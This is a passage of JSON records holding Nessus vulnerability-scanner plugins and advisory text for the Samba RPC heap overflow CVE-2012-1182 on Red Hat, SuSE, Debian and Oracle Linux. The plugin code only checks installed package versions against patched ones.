script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0506\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-debuginfo-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-debuginfo-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-debuginfo-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:43", "description": "A remote code execution flaw in Samba has been fixed :\n\n - PIDL based autogenerated code uses client supplied size values which allows attackers to write beyond the allocated array size. (CVE-2012-1182)", "cvss3": {"score": null, "vector": null}, "published": "2012-04-16T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Samba (ZYPP Patch Number 8058)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_CIFS-MOUNT-8058.NASL", "href": "https://www.tenable.com/plugins/nessus/58765", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58765);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"SuSE 10 Security Update : Samba (ZYPP Patch Number 8058)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remote code execution flaw in Samba has been fixed :\n\n - PIDL based autogenerated code uses client supplied size\n values which allows attackers to write beyond the\n allocated array size. (CVE-2012-1182)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1182.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8058.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"cifs-mount-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"ldapsmb-1.34b-25.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"libsmbclient-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"libsmbclient-devel-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-client-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-doc-3.0.36-0.12.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-krb-printing-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-vscan-0.3.6b-43.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"samba-winbind-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"libsmbclient-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"samba-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"samba-client-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"cifs-mount-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"ldapsmb-1.34b-25.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"libmsrpc-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"libmsrpc-devel-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"libsmbclient-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"libsmbclient-devel-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-client-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-doc-3.0.36-0.12.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-krb-printing-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-python-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-vscan-0.3.6b-43.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"samba-winbind-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"libsmbclient-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"samba-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"samba-client-32bit-3.0.36-0.13.20.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.0.36-0.13.20.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:44", "description": "It was discovered that Samba, the SMB/CIFS file, print, and login server, contained a flaw in the remote procedure call (RPC) code which allowed remote code execution as the super user from an unauthenticated connection.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-13T00:00:00", "type": "nessus", "title": "Debian DSA-2450-1 : samba - privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:samba", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2450.NASL", "href": "https://www.tenable.com/plugins/nessus/58729", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2450. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58729);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"DSA\", value:\"2450\");\n\n script_name(english:\"Debian DSA-2450-1 : samba - privilege escalation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Samba, the SMB/CIFS file, print, and login\nserver, contained a flaw in the remote procedure call (RPC) code which\nallowed remote code execution as the super user from an\nunauthenticated connection.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=668309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/samba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2450\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the samba packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libpam-smbpass\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient-dev\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libwbclient0\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-common\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-common-bin\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-dbg\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc-pdf\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-tools\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"smbclient\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"swat\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"winbind\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:54:25", "description": "From Red Hat Security Advisory 2013:0506 :\n\nUpdated samba4 packages that fix one security issue, multiple bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls. This could result in code generated by the PIDL compiler to not sufficiently protect against buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which provides a number of bug fixes and enhancements over the previous version. In particular, improved interoperability with Active Directory (AD) domains. SSSD now uses the libndr-krb5pac library to parse the Privilege Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity Management, which relies on the capabilities of the samba4 client library, is included as a Technology Preview. This functionality and server libraries, is included as a Technology Preview. This functionality uses the libndr-nbt library to prepare Connection-less Lightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security Authority (LSA) and Net Logon services to allow verification of trust from a Windows system. Because the Cross Realm Kerberos Trust functionality is considered a Technology Preview, selected samba4 components are considered to be a Technology Preview. For more information on which Samba packages are considered a Technology Preview, refer to Table 5.1, 'Samba4 Package Support' in the Release Notes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was rebooted, Winbind sometimes failed to reconnect when requested by 'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users using the wbinfo tool failed. This update applies upstream patches to fix this problem and now looking up a Security Identifier (SID) for a username, or a username for a given SID, works as expected after a domain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages, which fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat Enterprise Linux 6.4 and you have Samba in use, you should make sure that you uninstall the package named 'samba4' to avoid conflicts during the upgrade.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : samba4 (ELSA-2013-0506)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:samba4", "p-cpe:/a:oracle:linux:samba4-client", "p-cpe:/a:oracle:linux:samba4-common", "p-cpe:/a:oracle:linux:samba4-dc", "p-cpe:/a:oracle:linux:samba4-dc-libs", "p-cpe:/a:oracle:linux:samba4-devel", "p-cpe:/a:oracle:linux:samba4-libs", "p-cpe:/a:oracle:linux:samba4-pidl", "p-cpe:/a:oracle:linux:samba4-python", "p-cpe:/a:oracle:linux:samba4-swat", "p-cpe:/a:oracle:linux:samba4-test", "p-cpe:/a:oracle:linux:samba4-winbind", "p-cpe:/a:oracle:linux:samba4-winbind-clients", "p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2013-0506.NASL", "href": "https://www.tenable.com/plugins/nessus/68746", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0506 and \n# Oracle Linux Security Advisory ELSA-2013-0506 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68746);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0506\");\n\n script_name(english:\"Oracle Linux 6 : samba4 (ELSA-2013-0506)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0506 :\n\nUpdated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the 